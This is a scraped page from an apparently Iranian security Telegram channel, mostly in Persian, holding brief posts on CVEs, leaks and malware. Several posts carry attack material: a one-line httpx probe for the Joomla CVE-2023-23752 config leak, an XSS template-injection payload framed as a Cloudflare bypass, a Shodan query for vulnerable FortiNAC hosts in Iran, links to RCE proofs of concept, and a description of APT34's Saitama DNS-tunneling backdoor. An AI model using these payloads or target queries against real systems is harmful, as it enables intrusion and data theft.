Network Security Channel
2.57K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
My Backache's Main Reason!
#FUN #FACT
کانال آموزش کامپیوتر
@Engineer_Computer
😁1
⭕️CVE-2023-23752
Joomla webservice endpoint access
PoC

httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
#joomla #0day
کانال آموزش کامپیوتر
@Engineer_Computer
احراز هویت دو مرحله‌ای توییتر دیگر رایگان نخواهد بود‌‌

١. از تاریخ ۲۹ اسفند دسترسی به احراز هویت دو مرحله‌ای از طریق پیامک تنها در اختیار مشترکین سرویس Blue قرار می‌گیرد. هزینه استفاده از این طرح در هر ماه برای دستگاه‌های اندرویدی، ۸ دلار و برای محصولات اپل، ۱۱ دلار خواهد بود.

کانال آموزش کامپیوتر
@Engineer_Computer
"Network Nightmare" Mindmap.

It is a mindmap for conducting network attacks. For the most part, it will be useful to pentesters or red team operators.

• Traffic Hijacking;
• MiTM Attacks;
• Dynamic IGP Routing;
• Configuration Exfiltration;
• DoS;
• NAC/802.1X Bypassing;
• GRE Pivoting;
• Cisco EEM for hiding user;
• Authentication Cracking;
• Information Gathering;
• Cisco Passwords;
• VLAN Bypassing.

https://github.com/c4s73r/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.pdf

#Mindmap #Red_team
کانال آموزش کامپیوتر
@Engineer_Computer
Cloudflare bypass & template injection to XSS in one shoot

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

#cloudflare #bypass #xss
—————
کانال آموزش کامپیوتر
@Engineer_Computer
CVE-2023-23333 : SolarView Compact 6.00 - Remote Command Execution
POC : https://github.com/Timorlover/CVE-2023-23333
کانال آموزش کامپیوتر
@Engineer_Computer
CVE-2022-39952
به زودی شاهد غافل گیری ادمین های شبکه خواهیم بود
‏امنیت به تجهیزات شما نیست

https://www.shodan.io/search?query=http.favicon.hash%3A945408572+country%3AIR

‏اطلاعات بیشتر:

https://www.bleepingcomputer.com/news/security/fortinet-fixes-critical-rce-flaws-in-fortinac-and-fortiweb/
کانال آموزش کامپیوتر
@Engineer_Computer
‏نشت جدید: اطلاعات بیش از 800 هزار کاربر ‎#پونیشا هم اکنون در خطر افشای عمومی. این داده‌ها نام، نام خانوادگی، جنسیت، شماره ملی، تاریخ تولد، نام کاربری، تلفن همراه و اطلاعات دیگری از کاربران را شامل می‌شود. پونیشا قبلا هم دچار نشت داده شده بود. بیشتر بخوانید: https://wiki.leakfa.com/ponisha-new-leak
کانال آموزش کامپیوتر
Engineer_Computer
CVE-2023-0669 : GoAnywhere MFT < 7.1.2 - pre-authentication command injection
POC : https://github.com/0xf4n9x/CVE-2023-0669
کانال آموزش کامپیوتر
Engineer_Computer
👍2
نشت جدید: داده‌های بیش از 800 هزار کاربر "سایت فریلنسری ایرانی و کار آنلاین پونیشا" که بر روی یک Elasticsearch محافظت نشده قرار گرفته بود، هم اکنون در خطر افشای عمومی اطلاعات قرار گرفته‌اند. این داده‌ها نام، نام خانوادگی، جنسیت، شماره ملی، تاریخ تولد، نام کاربری، شماره تلفن همراه، شهر، کشور، نوع حساب، نوع پروفایل، تصویر پروفایل، تصویر روی جلد پروفایل، رزومه، موقعیت شغلی، سوابق تحصیلی، دانشگاه محل تحصیل، مهارت ها و اطلاعات دیگری از کاربران را شامل می‌شوند. این‌سایت دوسال پیش و در حوالی این روزها نیز دچار نشت اطلاعات دیگری شده بود.

کانال آموزش کامپیوتر
Engineer_Computer
ChatGPT
کانال آموزش کامپیوتر
@Engineer_Computer
ChatGPT
کانال آموزش کامپیوتر
@Engineer_Computer
دانلود جلسه اول دوره رایگان تست نفوذ وب OWASP
( آموزش HTTP )

https://cafenode.ir/OWASP-FREE/01/c01.mp4
https://cafenode.ir/OWASP-FREE/01/c02.mp4
https://cafenode.ir/OWASP-FREE/01/c03.mp4
https://cafenode.ir/OWASP-FREE/01/c04.mp4


کانال آموزش کامپیوتر
@Engineer_Computer
#Saitama #Malware #APT34
به گزارش Malwrebytes تیم APT34 ایرانی، اقدام به عملیات APT کرده بر روی یک مقام وزارت خارجه اردن رو هدف قرار داد که بواسطه یک ایمیل و فایل XLS که Attach شده در ایمیل، اقدام به ایجاد دسترسی کرده است.

زمانی که قربانی فایل XLS رو باز کرده و گزینه Enable Content رو فعال نماید، یک Macro مخرب فعال شده و فایل مخربی با نام update.exe رو Drop خواهد کرد.

اما نکته جالب توجه این Macro، استفاده از تکنیکی به نام Saitama است ظاهرا ابداع خود تیم APT34 بوده و تکنیکی برای ایجاد DNS Tunneling و ارسال فرمان مبتنی بر DNS بوده که در قسمت FQDN و بر روی زیر دامنه انجام کد گذاری میکند.

oxn009lc7n5887k96c4zfckes6uif.rootdomain.com

زمانی که Backdoor فعال میشود، به FQDN یک درخواست DNS ارسال کرده و مقدار IP رو دریافت میکند، این IPv4 مبتنی بر Octet مفهومی رو برای C2 معنا میکند، برای مثال آدرس زیر

70.119.104.111 - 97.109.105.49

اعداد کد Octet هستند که به کاراکترهای ASCII ترجمه میشوند، برای مثال w=119 ، h=104 ، o=111 و i=105 است که نهایتا کلمه whoami رو از خط فرمان (C2) به Backdoor ارسال میکند.